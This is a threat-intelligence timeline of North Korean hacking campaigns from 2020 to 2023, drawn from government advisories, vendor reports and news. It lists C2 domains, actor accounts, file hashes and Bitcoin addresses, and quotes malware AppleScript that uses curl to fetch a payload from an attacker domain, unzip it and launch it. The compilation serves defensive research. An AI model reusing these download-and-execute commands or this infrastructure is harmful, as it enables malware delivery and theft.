  • CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
  • https://cisa.gov/news-events/cybersecurity-advisories/aa20-239a

US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea

Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses

F-Secure: Report on Lazarus Group's targeting of crypto companies

US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.

  • Date:: 2020-09-20

Secret documents show how North Korea launders money through U.S. banks

Phrma Company Espionage Attacks

  • Date:: 2020-09
  • An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
  • After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
  • In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
  • At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
  • The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
  • In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.

NTT Security: Unveiling The Cryptomimic

CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky

  • Date:: 2020-10-27
  • CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.

NukeSped - Lazarus supply-chain attack in South Korea

  • Date:: 2020-11-16
  • https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/
  • WIZVERA VeraPort, referred to as an integration installation program, is a South Korean application that helps manage such additional security software.
  • The initial dropper is a console application that requires parameters, executing the next stages in a cascade and utilizes an encryption, cf. the watering hole attacks against Polish and Mexican banks
  • The final payload is a RAT module, with TCP communications and its commands indexed by 32-bit integers, cf. KillDisk in Central America
  • Many tools delivered via this chain are already flagged as NukeSped by ESET software. For example, the signed Downloader in the Analysis section is based on a project called WinHttpClient and it leads to the similar tool with hash 1EA7481878F0D9053CCD81B4589CECAEFC306CF2, which we link with with a sample from Operation Blockbuster (CB818BE1FCE5393A83FBFCB3B6F4AC5A3B5B8A4B). The connection between the latter two is the dynamic resolution of Windows APIs where the names are XOR-encrypted by 0x23, e.g., dFWwLHFMjMELQNBWJLM is the encoding of GetTokenInformation.

North Korean hackers targeted COVID vaccine maker AstraZeneca

OFAC Cyber-related Designations

Pharma Company Espionage Attacks

  • Date:: 2020
  • Stayed in their systems for months on end
  • Contacted in Feb 2020
  • Payload delivered in Q2/Q3
  • Data exif Q2 Q3 Q4 2020
  • By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
  • https://hvs-consulting.de/public/ThreatReport-Lazarus.pdf

2021

2021 Chainalysis Report: North Korean Hackers Crypto Holdings Reach All-time High

  • Date:: 2021-01-01
  • https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf
  • North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
  • These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
  • Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
  • While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
  • From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
  • Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
  • In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
  • The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
  • More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
  • Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
  • DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
  • Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.

Google TAG report on a new campaign targeting security researchers

  • Date:: 2021-01-25
  • government-backed entity based in North Korea. Social media targetting.
  • the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
  • Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
  • After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
  • In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn.io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
  • These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
  • https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
  • https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa

Microsoft: ZINC attacks against security researchers

  • Date:: 2021-01-28
  • https://microsoft.com/en-us/security/blog/2021/01/28/zinc-attacks-against-security-researchers/
  • A pre-build event with a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event is an innovative technique to gain execution.
  • Klackring malware
  • In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.
  • In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT eXplorer antivirus. The file was dropped to the victim system as C:\Windows\System32\drivers\circlassio.sys. The actor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver’s own code which crashed the victim’s machine.
  • Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https://codevexillium.org. The host DLL (SHA-256: ada7e80c…) was downloaded to the path C:\ProgramData\USOShared\USOShared.bin using PowerShell and then ran via rundll32. This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it dropped to C:\ProgramData\USOShared\USOShared.dat. Actor-controlled Twitter Handles
  • Twitter:: z055g
  • Twitter:: james0x40
  • Twitter:: mvp4p3r
  • Twitter:: dev0exp
  • Twitter:: BrownSec3Labs
  • Twitter:: br0vvnn
  • Twitter:: 0xDaria
  • LinkedIn:: james-williamson-55a9b81a6
  • LinkedIn:: guo-zhang-b152721bb
  • LinkedIn:: linshuang-li-aa69391bb
  • br0vvnn
  • dev0exp
  • henya290
  • james0x40
  • tjrim91
  • br0vvnn.io
  • blog.br0vvnn.io
  • C2:: codevexillium.org
  • C2:: angeldonationblog.com
  • C2:: investbooking.de
  • C2:: krakenfolio.com
  • C2:: codevexillium.org/image/download/download.asp
  • C2:: angeldonationblog.com/image/upload/upload.php
  • C2:: www.dronerc.it/shop_testbr/Core/upload.php
  • C2:: www.dronerc.it/forum/uploads/index.php
  • C2:: www.dronerc.it/shop_testbr/upload/upload.php
  • C2:: www.edujikim.com/intro/blue/insert.asp
  • C2:: investbooking.de/upload/upload.asp

Daily NK: Kim Jong Un is directly handling results of new COVID-19 hacking organization's work

FBI + CISA: Report on Operation AppleJeus - Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale

Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist

  • Date:: 2021-02-20
  • https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
  • Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
  • The United State Justice Department said Hushpupp conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
  • Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
  • “The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
  • Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
  • With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
  • Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.

Mun Chol-myon

A NEW NFT&DeFi TECH (PROTECTED).docx

Lazarus BTC Changer

AppleJeus: Analysis of North Korea’s Cryptocurrency Malware

The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks

ClearSky: Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus

ClearSky: Report on the Crypto Core APT group attributing it to the North Korean Lazarus APT

Andariel evolves to target South Korea with ransomware

  • Date:: 2021-06-15
  • https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
  • In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by the Korean Financial Security Institute as a sub-group of Lazarus.
  • Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
  • Mid-2020 onwards, they've leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.

HushPuppi - The Fall Of The Billionaire Gucci Master

Rapid Change of Stablecoin (Protected).docx secure.azureword.com Z Venture Capital Presentation(Protected).docx

Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors

2022

CVE-2022-0609 Earliest sighting of this particular kit

  • Date:: 2022-01-04

Kapersky Report: SnatchCrypto Campaign

North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High

North Korea Hacked Him. So He Took Down Its Internet

CVE-2022-0609 reported by Google TAGs Clément Lecigne - use after free animation

  • Date:: 2022-02-10
  • TAG discovered two distinct North Korean attacker groups exploiting remote execution vulnerability
  • Operation Dream Job + Operation AppleJeus

CVE-2022-0609 Chrome Update Released - use after free animation

  • Date:: 2022-02-14

What Wicked Webs We Un-weave

CVE-2022-1096 reported by anon - type confusion V8

  • Date:: 2022-03-23

FireEye/Mandriant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations

  • Date:: 2022-03-23

CVE-2022-0609 Google posts update abt zero day CVE-2022-0609 - Operation Dream Job and Operation AppleJeus

  • Date:: 2022-03-24
  • Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
  • Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
  • Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
  • The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (1️⃣ CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system.
  • https://blog.google/threat-analysis-group/countering-threats-north-korea/

CVE-2022-1096 Chrome Update Released - type confusion V8

  • Date:: 2022-03-25

Lazarus Trojanized DeFi app for delivering malware

APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users

  • Date:: 2022-04-12
  • In this attack, Lazarus built a type of decoy document containing an “AhnLab ” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
  • Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.

CVE-2022-1364 Reported by Google TAG's Clément Lecigne

  • Date:: 2022-04-13
  • Type Confusion, V8 Engine

CVE-2022-1364 Chrome Update Released, everyone told to update urgently

Ronin Bridge Hack Attributed to Lazarus Group, addresses added to OFAC list

Tornado Cash uses Chainalysis Oracle to blcok OFAC addresses (from frontend)

TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

How the DPRK became a hacking powerhouse and why it loves crypto

Guidance on the DPRK IT Workers

Insight: Crypto crash threatens North Korea's stolen funds as it ramps up weapons tests

Here’s how North Korean operatives are trying to infiltrate US crypto firms

AppleSeed Disguised as Purchase Order and Request Form Being Distributed

US disrupts North Korean hackers that targeted hospitals

AppleSeed Being Distributed to Maintenance Company of Military Bases

Proofpoint: Macro-Blocking & How Threat Actors Are Adapting

Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

U.S. Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash

Suspected Tornado Cash developer arrested in Netherlands

Andariel deploys DTrack and Maui ransomware

UNC4034 Spreading Trojanized Versions of PuTTY Client Application - DPRK Job Opportunity Phishing via WhatsApp

Lazarus ‘Operation In(ter)ception’ Targets macOS Users Dreaming of Jobs in Crypto

ESET: Lazarus & BYOVD: Evil To The Windows Core

Microsoft: ZINC weaponizing open-source software

  • Date:: 2022-09-29
  • https://microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
  • ZINC, Diamond Sleet
  • Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
  • Weaponized wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks
  • Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
  • The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.

Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD

U.S. targets North Korean fuel procurement network for breaching UN sanctions

Lazarus Group Uses the DLL Side-Loading Technique (mi.dll)

With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’

Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered

Distribute AppleSeed to companies related to nuclear power plants

Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration

Volexity: ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware

Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry

  • Date:: 2022-12-06
  • https://microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/
  • AppleJeus, Citrine Sleet, OKX Fee Adjustment
  • We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
  • After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
  • A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
  • The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
  • The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
  • The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
  • Telegram Group: <NameOfTheTargetedCompany> <> OKX Fee Adjustment
  • OKX Binance & Huobi VIP fee comparision.xls - abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0

Seoul: North Korean hackers stole $1.2B in virtual assets

SlowMist: Investigation of North Korean APT’s Large-Scale Phishing Attack on NFT Users

2023

Lazarus - The suspected APT-C-26 (Lazarus) organization conducts attack activity analysis through cryptocurrency wallet promotion information

Kimsuky - North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy

Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

FBI: Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft

Proofpoint: TA444 - The APT Startup Aimed at Acquisition (of Your Funds)

CISA: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

  • Date:: 2023-02-09
  • https://cisa.gov/news-events/cybersecurity-advisories/aa23-040a
  • 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
  • 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
  • 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
  • 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
  • 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
  • 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
  • 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
  • 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
  • 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
  • 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
  • bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
  • bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
  • bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
  • bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
  • bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
  • bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
  • bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
  • bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
  • bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
  • bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
  • bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
  • bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
  • bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
  • bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn
  • bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
  • bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
  • bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
  • bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
  • bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
  • bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
  • bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
  • bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
  • bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
  • bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
  • bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
  • bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
  • bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
  • bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
  • bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
  • bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
  • bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
  • bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
  • LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135

Kimsuky: Malware Disguised as Normal Documents

  • Date:: 2023-02-15
  • Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers; in this case, the threat actor used an image that prompts users to execute the macro.
  • https://asec.ahnlab.com/en/47585/

Lazarus Anti-Forensic Techniques

  • Date:: 2023-02-23
  • The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
  • https://asec.ahnlab.com/en/48223/

Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police

WinorDLL64 - backdoor from the vast Lazarus arsenal

Mandiant:: Stealing the LIGHTSHOW - LIGHTSHIFT and LIGHTSHOW - North Korea's UNC2970

Kimsuky - CHM Malware Disguised as North Korea-related Questionnaire (Kimsuky)

Kimsuky - OneNote Malware Disguised as Compensation Form

Kimsuky - Distributes Malware Disguised as Profile Template (GitHub)

Inside the international sting operation to catch North Korean crypto hackers

Lazarus DeathNote campaign

Google TAG - How we’re protecting users from government-backed attacks from North Korea

Linux malware strengthens links between Lazarus and the 3CX supply-chain attack

Jamf - BlueNoroff APT group targets macOS with ‘RustBucket’ Malware

North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies

Half of North Korean missile program funded by cyberattacks and crypto theft, White House says

JPCERT/CC Eyes: Attack Trends Related to DangerousPassword

  • Date:: 2023-05-12
  • https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html
  • DangerousPassword, CryptoMimic, SnatchCrypto
  • Attacks by sending malicious CHM files from LinkedIn
  • Attacks using OneNote files
  • Attacks using virtual hard disk files
  • Attacks targeting macOS:
  • An AppleScript is contained, and it downloads an unauthorized application in main.scpt using the curl command and then executes it.
  • do shell script “curl -o /users/shared/1.zip https://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV@p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A curl"
  • do shell script "unzip -o -d /users/shared /users/shared/1.zip"
  • do shell script “open \"/users/shared/Internal PDF Viewer.app\""
  • cloud.dnx.capital

APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis

Kimsuky - Phishing Attacks Targetting North Korea-Related Personnel

US sanctions orgs behind North Korea’s ‘illicit’ IT worker army

North Korea is now Mining Crypto to Launder Its Stolen Loot

  • Date:: 2023-05-23
  • Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
  • Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
  • https://web.archive.org/web/20230328150400/https://wired.com/story/north-korea-apt43-crypto-mining-laundering/

Bluenoroff’s RustBucket campaign (SnatchCrypto)

  • Date:: 2023-05-23
  • https://blog.sekoia.io/bluenoroffs-rustbucket-campaign
  • cloud.dnx.capital
  • The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
  • When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine pages document about a venture capital company that appears to be the printout of a legit company’s website. The fake PDF reader uses a hardcoded 100-bytes XOR key to decrypt the new content of the document and the C2 server configuration.
  • During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the “key” PDF requiring user interaction.
  • Bluenoroff’s observed initial intrusion vector includes phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend.me, further analysis led us to the following LinkedIn profile:
  • RustBucket MacOS version - 2023-05-08 - Jump Crypto Investment Agreement
